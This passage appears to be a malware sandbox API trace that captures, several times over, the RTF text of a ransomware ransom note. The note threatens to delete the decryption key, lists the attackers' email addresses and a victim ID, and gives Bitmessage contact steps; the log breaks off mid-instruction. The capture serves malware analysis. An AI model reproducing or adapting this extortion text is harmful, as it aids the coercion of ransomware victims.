EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.804] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.804] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick 